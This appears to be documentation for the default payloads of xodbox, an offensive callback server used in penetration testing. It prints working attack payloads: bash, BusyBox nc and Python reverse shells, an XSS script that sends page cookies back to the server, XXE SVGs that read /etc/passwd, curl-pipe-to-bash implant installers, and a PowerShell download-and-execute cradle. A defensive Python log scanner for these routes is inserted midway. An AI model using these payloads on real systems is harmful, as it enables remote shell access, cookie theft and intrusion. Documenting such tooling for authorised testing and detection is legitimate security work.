Default payloads that come with xodbox.
Default Payloads Seeds
- 1: Default Header
- 2: Redirect
- 3: Remote Address Reflector
- 4: Robots TXT
- 5: Build MDaaS
- 6: Inspect
- 7: XSS HTML
- 8: XSS JavaScript
- 9: Default Favicon
- 10: Bash Reverse Shell
- 11: Bind Shell
- 12: BusyBox Reverse Shell
- 13: Detect platform
- 14: HTML IFrame With Request Params
- 15: Open Graph
- 16: Python Reverse Shell
- 17: Reverse Shell
- 18: Simple SSH
- 19: Simple SSH Service
- 20: XSS Image Template
- 21: XXE Callback
- 22: XXE DTD
- 23: XXE SVG Hostname
- 24: XXE SVG Passwd
- 25: XXE SVG Request Params
- 26: XXE System
- 27: Default Page
- 28: In Development Seeds
- 28.1: Bind shell powershell
- 28.2: Pipe Process List to Notifier
- 28.3: WPAD
1 - Default Header
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
2 - Redirect
Redirects to the URL given in the query parameter l, using the query parameter s as the HTTP status code.
| What | Description | GET Parameters |
|---|---|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
3 - Remote Address Reflector
Reflects the client's remote address back in the response body.
Example Request
curl http://xodbox.test/ip
Example Response
10.1.2.3
4 - Robots TXT
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
5 - Build MDaaS
6 - Inspect
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
- Plain Text (default, .txt)
- HTML (.html)
- GIF (.gif)
- JPEG (.jpg)
- PNG (.png)
- MP4 (.mp4)
- XML (.xml)
- JSON (.json)
- Javascript (.js)
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
7 - XSS HTML
/jsc.html
Simple HTML to load simple JS Payload.
8 - XSS JavaScript
/jsc
Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload to prove execution and exfiltration.
(function (){
var s = document.createElement("img");
document.body.appendChild(s);
s.src="//{{.Request.Host}}/{{ .NotifyString}}/jscb?src="+window.location+"&c="+document.cookie;
})()
9 - Default Favicon
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
10 - Bash Reverse Shell
Useful for reverse shells on systems that have bash.
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
Example Request
curl -i "http://xodbox.test/rsh/bash?h=10.10.10.10&p=9090"
Example Response
bash -i >& /dev/tcp/127.0.0.1/9091 0>&1
0<&196;exec 196<>/dev/tcp/127.0.0.1/9091 ; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/127.0.0.1/9091 0<&1 2>&1
11 - Bind Shell
Build a bind shell implant for the specific platform and execute it.
Example Request
curl xodbox/bind.sh|bash
12 - BusyBox Reverse Shell
Useful for reverse shells on BusyBox systems.
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
Example Request
curl -i "http://xodbox.test/rsh/bb?h=10.10.10.10&p=9090"
Example Response
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1111 >/tmp/f
13 - Detect platform
Example Request
curl -i "http://xodbox.test/detect.sh"
This will curl the notification URL with the detected platform values in the path.
14 - HTML IFrame With Request Params
/ht
Attempts to fetch whichever file is supplied via the f query parameter.
15 - Open Graph
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
16 - Python Reverse Shell
Useful for reverse shells on systems that have Python.
Params
| Parameter | Default Value | Description |
|---|---|---|
| h | Client IP address | Host to connect to |
| p | 9091 | Port to connect to |
Example Request
curl -i "http://xodbox.test/rsh/python?h=10.10.10.10&p=9090"
Example Response
import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",9091));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
17 - Reverse Shell
Build a reverse shell implant for the specific platform and execute it.
Example Request
curl xodbox/reverse.sh|bash
18 - Simple SSH
Build an SSH server implant for the specific platform and execute it.
Example Request
curl xodbox/ssh.sh|bash
19 - Simple SSH Service
Build an SSH server implant for the specific platform and install it as a service, then start the service.
Example Request
curl xodbox/ssh.sh|bash
20 - XSS Image Template
21 - XXE Callback
XXE Callback used by xxe-system
22 - XXE DTD
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
DTD for use by others.
23 - XXE SVG Hostname
/sh
SVG with XXE payloads; attempts to read /etc/hostname.
24 - XXE SVG Passwd
/sp
Attempts to read /etc/passwd.
25 - XXE SVG Request Params
/sv
Attempts to read whichever file is supplied via the f query parameter.
26 - XXE System
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
27 - Default Page
Serves the default response body at the root path.
Example Request
curl -i http://xodbox.test/
Example Response
hi
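From the defender's side, requests to the default routes listed above show up in egress-proxy logs, and the query parameters carry the interesting details: src and c on the jscb callback, h and p on the /rsh/ fetches. The following Python scan is an added example, not part of xodbox, that flags such requests in a constructed proxy log; the log line shape ("<client-ip> <method> <url>"), the 203.0.113.9 host and the sample entries are all assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Default xodbox routes documented above, keyed by payload family. The short
# XXE routes (/dt, /sh, /sp, /sv) will be noisy on real traffic; tune as needed.
ROUTE_PATTERNS = {
    "xss-callback": re.compile(r"/jscb$"),
    "reverse-shell": re.compile(r"/rsh/(bash|bb|python)$"),
    "implant-fetch": re.compile(r"/(bind|reverse|ssh|detect)\.sh$"),
    "xxe": re.compile(r"/(evil\.dtd|dt|sh|sp|sv)$"),
    "inspect": re.compile(r"/inspect(\.(txt|html|gif|jpg|png|mp4|xml|json|js))?$"),
}

# Assumed proxy-log shape for this example: "<client-ip> <method> <url>".
LOG_LINE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")

# Constructed sample log; 203.0.113.9 stands in for the xodbox host.
SAMPLE_LOG = """\
10.0.0.5 GET http://203.0.113.9/jscb?src=https://intranet.example/app&c=session=abc123
10.0.0.7 GET http://203.0.113.9/rsh/bash?h=203.0.113.9&p=9090
10.0.0.7 GET http://203.0.113.9/bind.sh
10.0.0.8 GET http://203.0.113.9/some/random/path/inspect.gif
10.0.0.9 GET https://www.example.com/index.html
""".splitlines()

def classify(url):
    """Return the payload family whose route the URL path matches, or None."""
    path = urlsplit(url).path
    for family, pattern in ROUTE_PATTERNS.items():
        if pattern.search(path):
            return family
    return None

def scan(lines):
    """Return (client, family, detail) for each request to a default route."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        family = classify(m.group("url")) if m else None
        if family is None:
            continue
        query = parse_qs(urlsplit(m.group("url")).query)
        detail = {}
        if family == "xss-callback":
            # src is the page the payload ran on; c carries document.cookie
            detail = {"origin": query.get("src", [""])[0], "cookie_exfil": "c" in query}
        elif family == "reverse-shell":
            # h and p default to the client IP and 9091 when absent (see the Params tables)
            detail = {"callback_host": query.get("h", ["<client ip>"])[0], "port": query.get("p", ["9091"])[0]}
        hits.append((m.group("client"), family, detail))
    return hits
```

Running scan(SAMPLE_LOG) reports the four requests to xodbox routes and ignores the ordinary web request; the origin field on the callback hit tells you which internal page the injected script executed on.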
28 - In Development Seeds
Seeds that are not tested or finished.
28.1 - Bind shell powershell
iex ((New-Object System.Net.WebClient).DownloadString('http://xobox/bind.ps1'))
28.2 - Pipe Process List to Notifier
Example Request
curl xodbox/pipe.sh|bash
28.3 - WPAD
WPAD proxy. Not really useful at the moment; it should become more useful in the future.